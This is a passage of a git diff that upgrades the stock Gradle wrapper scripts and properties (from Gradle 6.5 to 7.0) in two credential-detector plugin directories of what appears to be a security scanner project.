b/google/detectors/credentials/cve20177615/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/credentials/cve20177615/gradle/wrapper/gradle-wrapper.properties b/google/detectors/credentials/cve20177615/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/credentials/cve20177615/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/credentials/cve20177615/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/credentials/cve20177615/gradlew b/google/detectors/credentials/cve20177615/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/credentials/cve20177615/gradlew +++ b/google/detectors/credentials/cve20177615/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/credentials/cve20177615/gradlew.bat b/google/detectors/credentials/cve20177615/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/credentials/cve20177615/gradlew.bat +++ b/google/detectors/credentials/cve20177615/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/credentials/generic_weak_credential_detector/gradle/wrapper/gradle-wrapper.jar b/google/detectors/credentials/generic_weak_credential_detector/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/credentials/generic_weak_credential_detector/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/credentials/generic_weak_credential_detector/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/credentials/generic_weak_credential_detector/gradle/wrapper/gradle-wrapper.properties b/google/detectors/credentials/generic_weak_credential_detector/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/credentials/generic_weak_credential_detector/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/credentials/generic_weak_credential_detector/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/credentials/generic_weak_credential_detector/gradlew b/google/detectors/credentials/generic_weak_credential_detector/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/credentials/generic_weak_credential_detector/gradlew +++ b/google/detectors/credentials/generic_weak_credential_detector/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/credentials/generic_weak_credential_detector/gradlew.bat b/google/detectors/credentials/generic_weak_credential_detector/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/credentials/generic_weak_credential_detector/gradlew.bat +++ b/google/detectors/credentials/generic_weak_credential_detector/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b 